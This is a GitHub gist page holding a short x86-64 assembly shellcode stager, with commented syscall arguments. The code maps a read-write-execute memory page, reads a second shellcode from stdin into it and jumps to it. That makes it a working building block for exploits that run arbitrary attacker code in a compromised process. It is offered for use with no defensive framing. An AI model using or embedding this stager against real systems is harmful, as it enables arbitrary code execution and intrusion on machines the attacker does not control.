Created
December 4, 2018 15:09
-
-
Save ppmx/038e90e9a1906e04d4fe8fbece0c68bf to your computer and use it in GitHub Desktop.
x86-64 shellcode to read another shellcode from stdin and execute it
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BITS 64 | |
| ; syscall: | |
| ; | |
| ; ptr = mmap(NULL, size, PROT_EXEC | PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0) | |
| ; | |
| ; | |
| ; arguments: | |
| ; | |
| ; 1. argument: rdi = NULL | |
| ; 2. argument: rsi = 4096 | |
| ; 3. argument: rdx = 7 | |
| ; 4. argument: r10 = 34 | |
| ; 5. argument: r8 = -1 | |
| ; 6. argument: r9 = 0 | |
| ; | |
| ; syscall sys_mmap | |
| ; rax = 9 | |
| xor rdi, rdi | |
| mov rsi, 0x1000 | |
| mov rdx, 0x7 | |
| mov r10, 0x22 | |
| xor r8, r8 | |
| ;mov r8d,0xffffffff | |
| dec r8 | |
| xor r9, r9 | |
| mov rax, 9 | |
| syscall | |
| ; syscall: | |
| ; | |
| ; read(fd, *buf, count) | |
| ; | |
| ; | |
| ; arguments: | |
| ; | |
| ; 1. argument: rdi = stdin = 0 | |
| ; 2. argument: rsi = mmap buffer address | |
| ; 3. argument: rdx = 4096 | |
| ; | |
| ; syscall sys_read | |
| ; rax = 0 | |
| xchg rsi, rdx | |
| mov rsi, rax | |
| xor rax, rax | |
| syscall | |
| call rsi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment